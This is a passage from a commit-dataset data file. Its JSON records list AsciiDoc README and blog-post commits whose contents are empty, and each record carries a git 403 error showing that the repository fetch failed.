2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e162f09e5e41307c2eb1150eb2f785506a4b1a89","subject":"Explains city employee features.","message":"Explains city employee features.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/features.adoc","new_file":"docs\/features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d012cdd26734f32130f1d14cfc4c2a37eb9b6e0c","subject":"Update 2017-02-04-Go.adoc","message":"Update 2017-02-04-Go.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-02-04-Go.adoc","new_file":"_posts\/2017-02-04-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d5c90e7a1afe055ba8c5b8e24f4fe6b082e5eb3","subject":"Typo correction in readme.adoc","message":"Typo correction in readme.adoc","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e52227a2da41193a9e3877cabc4670a7e381404","subject":"Added a README","message":"Added a README\n","repos":"feedhenry-raincatcher\/raincatcher-demo-mobile,feedhenry-raincatcher\/raincatcher-demo-mobile","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feedhenry-raincatcher\/raincatcher-demo-mobile.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7646a369911e300bb153f6da94e99224507b37ec","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-uuid,sdavids\/sdavids-commons-uuid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-uuid.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c698139ed61bf48af582527a832a31a3825a582","subject":"Added twitter batch","message":"Added twitter batch","repos":"storozhukBM\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"261fb08225c1b0fc28c2e63450e0be3c31e2bbeb","subject":"Readme fix","message":"Readme fix\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,goldobin\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"435c2338db6877e8c94e33d72fb60a52417180bd","subject":"fix data rest link on the readme page","message":"fix data rest link on the readme page","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5de2adf36a89261400ca597bcc9909c6474cf6e9","subject":"Add readme","message":"Add readme\n","repos":"antoyo\/relm,antoyo\/relm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/antoyo\/relm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65f4ec2fe21dadff95b0ce36b96219dc5a460e8f","subject":"Initial import","message":"Initial import\n","repos":"roamingthings\/security-server,roamingthings\/security-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roamingthings\/security-server.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d0078b39ff50d1d6b6b5eb78a5a8a52ccdc1877","subject":"README initial commit","message":"README initial commit\n","repos":"tsegismont\/vertx-monitor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsegismont\/vertx-monitor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"920bd8148a28af56b0edd33d933f08f48fc2e695","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"790900504cdf4368e424e695c4cde39d7d015b94","subject":"chore(index): \u3082\u3046\u5c11\u3057\u5206\u304b\u308a\u3084\u3059\u304f\u30d0\u30b0\u3092\u6f70\u3057\u305f","message":"chore(index): \u3082\u3046\u5c11\u3057\u5206\u304b\u308a\u3084\u3059\u304f\u30d0\u30b0\u3092\u6f70\u3057\u305f\n\nhttps:\/\/twitter.com\/yuya_takeyama\/status\/480969917496176641\n","repos":"purepennons\/promises-book,purepennons\/promises-book,cqricky\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,wenber\/promises-book,charlenopires\/promises-book,liubin\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,wenber\/promises-book,dieface\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,charlenopires\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,oToUC\/promises-book,azu\/promises-book,wenber\/promises-book,azu\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,mzbac\/promises-book,oToUC\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,genie88\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,azu\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,xifeiwu\/promises-book","old_file":"index.adoc","new_file":"index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fe3f137ba79ff47bcca1bdd6dab796d67107b3f","subject":"To adoc","message":"To adoc\n","repos":"tkmtwo\/tkmtwo-kavro","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tkmtwo\/tkmtwo-kavro.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a9d93243559e8ce20ed8be49307f710d591985e","subject":"[fix] toc placement","message":"[fix] toc placement\n\n(Was my fault)\n\nhttps:\/\/www.jenkins.io\/doc\/developer\/publishing\/documentation\/#table-of-contents\n","repos":"netceler\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netceler\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"807c9300ad97d1e2e41fe929f2a050ae6f9354a7","subject":"add some documentation","message":"add some documentation\n","repos":"torstenwerner\/java-9-no-jar-hell,torstenwerner\/java-9-no-jar-hell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/torstenwerner\/java-9-no-jar-hell.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"bd53d88b567cc4722d40646d19c00f31211f37fb","subject":"Add README","message":"Add README\n","repos":"DavidGamba\/go-getoptions","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavidGamba\/go-getoptions.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"ddb879a007efd0b14ad445543bd2c6a1ba55c8ce","subject":"Create new README file in asciidoctor format.","message":"Create new README file in asciidoctor format.","repos":"denarced\/stargate-atlantis-transcript,denarced\/stargate-atlantis-transcript","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/denarced\/stargate-atlantis-transcript.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4fd831fed92e0eda46fdde563f3a3c28b3cc862","subject":"initial adoc documentation","message":"initial adoc documentation\n","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a84157ce81bebb4908c3e3b145903541800168a4","subject":"Update step order","message":"Update step order","repos":"jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ca9db898d55a641e1484322529ddf9fd509ac6e","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"techdev-solutions\/kotlin-intro,techdev-solutions\/kotlin-intro","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/techdev-solutions\/kotlin-intro.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f03566f40bb47b8906b4f72ad76e2b4d12fb287d","subject":"readme","message":"readme\n","repos":"codezork\/BlueNodes,codezork\/BlueNodes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codezork\/BlueNodes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f86cb7470be1cbdafb16b8092f6a64436bf46f79","subject":"Added README as first specs","message":"Added README as first specs\n","repos":"CedricGatay\/manifest-mixin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CedricGatay\/manifest-mixin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9bb3613d392945e39c72a99b7ac84fc5d9a5efc8","subject":"docs(README): update the vagrant command adoc syntax","message":"docs(README): update the vagrant command adoc syntax\n","repos":"looztra\/mesos-marathon-chronos-in-a-box","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/looztra\/mesos-marathon-chronos-in-a-box.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99f7e0d41902d78c81056d74f8c34971cbe29b43","subject":"Created symlink to README","message":"Created symlink to README\n","repos":"Yubico\/php-u2flib-server,shield-9\/php-u2flib-server,shield-9\/php-u2flib-server,Yubico\/php-u2flib-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shield-9\/php-u2flib-server.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f06a39ac31ad7178a446f35c6685866211b6672e","subject":"Add code coverage link\/icon","message":"Add code coverage link\/icon\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60d266ddf6900a18fb8d27b8195373ba1a0fd3d6","subject":"Remove the link to kythe-early-interest, as it is now unnecessary.","message":"Remove the link to kythe-early-interest, as it is now unnecessary.\n","repos":"kidaa\/kythe,bzz\/kythe,benjyw\/kythe,kythe\/kythe,kidaa\/kythe,benjyw\/kythe,benjyw\/kythe,bzz\/kythe,legrosbuffle\/kythe,kidaa\/kythe,Acidburn0zzz\/kythe,benjyw\/kythe,bowlofstew\/kythe,Acidburn0zzz\/kythe,bowlofstew\/kythe,legrosbuffle\/kythe,kythe\/kythe,benjyw\/kythe,benjyw\/kythe,legrosbuffle\/kythe,legrosbuffle\/kythe,kidaa\/kythe,legrosbuffle\/kythe,benjyw\/kythe,bzz\/kythe,kythe\/kythe,kythe\/kythe,benjyw\/kythe,bowlofstew\/kythe,kidaa\/kythe,legrosbuffle\/kythe,legrosbuffle\/kythe,kidaa\/kythe,bzz\/kythe,benjyw\/kythe,benjyw\/kythe,bowlofstew\/kythe,Acidburn0zzz\/kythe,benjyw\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,kythe\/kythe,bowlofstew\/kythe,Acidburn0zzz\/kythe,legrosbuffle\/kythe,kidaa\/kythe,kidaa\/kythe,legrosbuffle\/kythe,bowlofstew\/kythe,bzz\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,legrosbuffle\/kythe,kythe\/kythe,kythe\/kythe,kythe\/kythe,Acidburn0zzz\/kythe,bzz\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,bzz\/kythe,benjyw\/kythe,bowlofstew\/kythe,bowlofstew\/kythe,bowlofstew\/kythe,bzz\/kythe,kythe\/kythe,bowlofstew\/kythe,kythe\/kythe,kidaa\/kythe,legrosbuffle\/kythe,kythe\/kythe,bowlofstew\/kythe","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/legrosbuffle\/kythe.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef9ab541073bd31841f88413a85337d7a636f9c7","subject":"Switching to asciidoc","message":"Switching to asciidoc\n","repos":"lafent\/netc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lafent\/netc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be111629ffdcdf531d55803507b039f5ac00281c","subject":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3e714bae5465e99de28a3b84133b22880857c55","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da8036fa41e30f796a90ebb4fdd533db9f6ebdce","subject":"y2b create post Unboxing The World's Smallest Phone","message":"y2b create post Unboxing The World's Smallest Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-06-UnboxingTheWorldsSmallestPhone.adoc","new_file":"_posts\/2018-01-06-UnboxingTheWorldsSmallestPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1146b288b3a8630f6911cf895b0667ab669269b3","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-entity,sdavids\/sdavids-commons-entity","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-entity.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35d6fba8c5b1fe8203086e60f77dde5a3a4d3bc8","subject":"Added readme","message":"Added readme\n","repos":"CyrilSahula\/REST-API-Doc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CyrilSahula\/REST-API-Doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5eeb7bb3d037bb134f9286a751745ce91ed8dd4f","subject":"chore: add badges","message":"chore: add badges\n","repos":"gravitee-io\/gravitee.io,gravitee-io\/gravitee.io,Laurie-Maurer\/gravitee.io,gravitee-io\/gravitee.io,Laurie-Maurer\/gravitee.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Laurie-Maurer\/gravitee.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4771e4b60ed84b8e31cbad19ccea894473f6c29c","subject":"Add travisCI banner","message":"Add travisCI banner\n","repos":"mdenchev\/mui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"350fc94b70ff1d76cc97043231c069db15bc6e99","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sdtui,pjanouch\/sdtui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdtui.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"1e0877d6f2b3aa777286759c648ff59ed2744df9","subject":"Update 2015-09-17-first-commit.adoc","message":"Update 2015-09-17-first-commit.adoc","repos":"popurax\/popurax.github.io,popurax\/popurax.github.io,popurax\/popurax.github.io","old_file":"_posts\/2015-09-17-first-commit.adoc","new_file":"_posts\/2015-09-17-first-commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/popurax\/popurax.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7ed23d28700a1c4a8425094013fc9ef5e95f32d","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"deb415d37b4acd643fe8c729d3018450c788d05d","subject":"Update 2016-04-11-Another-post.adoc","message":"Update 2016-04-11-Another-post.adoc","repos":"RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test","old_file":"_posts\/2016-04-11-Another-post.adoc","new_file":"_posts\/2016-04-11-Another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RussellSnyder\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9233eeb08d4feb97d89ecc58c7571d8f381a6bf","subject":"Update 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","message":"Update 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_file":"_posts\/201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68e2ad0c97b38597b41a1be1ffd1997e1eee2a0c","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6d87822a26c28ce8333a1860013453667571fe9","subject":"y2b create post Giving Up My Smartphone...","message":"y2b create post Giving Up My Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-25-Giving-Up-My-Smartphone.adoc","new_file":"_posts\/2016-06-25-Giving-Up-My-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36cef79be020b1d7a385fb9fc8ccfe18c7a8a214","subject":"Update 2016-08-09-Type-Script-para-mancos.adoc","message":"Update 2016-08-09-Type-Script-para-mancos.adoc","repos":"josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog","old_file":"_posts\/2016-08-09-Type-Script-para-mancos.adoc","new_file":"_posts\/2016-08-09-Type-Script-para-mancos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josegomezr\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74d12b85b070ac1e2a70c081401f3b9192180488","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"335131c1d13f80caf1dd326758e154317283c780","subject":"update release notes","message":"update release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81f679fce64dae78e54dfef0dfa49fe226ad73e2","subject":"Update 2015-06-11-WalkingMapKyoto.adoc","message":"Update 2015-06-11-WalkingMapKyoto.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af661c56d7dbe8bcc9458a8ac4ebf11e12443dcf","subject":"Update 2015-09-25-Blog-simplified.adoc","message":"Update 2015-09-25-Blog-simplified.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db869ad8c1f2ff92bc49987ccd666e625793c419","subject":"Update 2017-01-06-ppap-javascript.adoc","message":"Update 2017-01-06-ppap-javascript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"502b88aaaec33fde8ced9e3e289c6f71765f704d","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 